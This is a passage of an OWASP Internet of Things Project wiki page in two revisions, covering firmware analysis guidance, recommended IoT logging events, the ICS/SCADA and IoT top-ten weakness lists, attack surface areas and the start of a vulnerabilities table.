* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246176OWASP Internet of Things Project2018-12-19T23:24:56Z<p>Aaron.guzman: /* Updated! */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
==OWASP Internet of Things (IoT) Project==<br />
<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The OWASP IoT Project is currently reviewing the Top Ten list for 2018. The official launch date is December 2018. Provide your insight and expertise by joining the #iot-security channel meetups on Slack.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
